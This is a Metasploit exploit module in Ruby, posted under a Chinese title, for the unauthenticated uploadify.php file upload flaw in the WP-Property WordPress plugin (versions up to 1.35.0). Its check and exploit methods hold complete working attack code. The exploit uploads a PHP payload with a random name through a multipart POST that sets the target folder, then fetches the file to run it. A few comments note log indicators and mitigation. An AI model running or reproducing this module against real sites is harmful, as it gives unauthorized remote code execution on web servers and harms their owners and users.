WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

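# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (the description below lists versions <= 1.35.0 as affected).
#
# What the module does on the wire, and therefore what shows up in web logs:
#   1. check:   a GET for the plugin's bundled uploadify.php.
#   2. exploit: a multipart POST to the same uploadify.php with a "Filedata"
#               part whose file name ends in .php and a client-chosen "folder"
#               field, followed by a GET for the path the server returned.
# Removing the bundled uploadify handler, or moving off the affected plugin
# versions, takes away the endpoint both steps depend on.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers module metadata (references, targets, payload constraints) and
  # the TARGETURI option pointing at the WordPress base path.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the plugin's uploadify.php.
  #
  # Returns CheckCode::Unknown when there is no response or the status is not
  # 200, otherwise CheckCode::Appears. The probe looks at nothing but the HTTP
  # status: it does not read the plugin version or the response body, so
  # "Appears" only means the script path exists and answers.
  def check
    uri = target_uri.path
    uri += '/' unless uri[-1, 1] == '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    return Exploit::CheckCode::Unknown unless res && res.code == 200

    Exploit::CheckCode::Appears
  end

  # Uploads a PHP file through uploadify.php and then requests it.
  #
  # The upload is treated as successful only when the response is HTTP 200 and
  # its body contains the generated file name; otherwise the module stops with
  # Failure::UnexpectedReply. The response body is then used verbatim as the
  # URI of the follow-up GET.
  def exploit
    uri = target_uri.path
    uri += '/' unless uri[-1, 1] == '/'

    peer = "#{rhost}:#{rport}"

    # Random five-letter name, so a fixed file name is not a usable indicator;
    # the .php extension inside the uploadify directory is.
    @payload_name = "#{rand_text_alpha(5)}.php"
    # Helper from the PhpEXE mixin; :unlink_self presumably makes the dropped
    # file remove itself once it has run -- confirm against the mixin.
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    # The destination directory is a client-supplied form field.
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Drop the CRLF that precedes a boundary marker at the start of a line.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    unless res && res.code == 200 && res.body =~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end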
不要问我这写的是什么 怎么利用 我是说msf..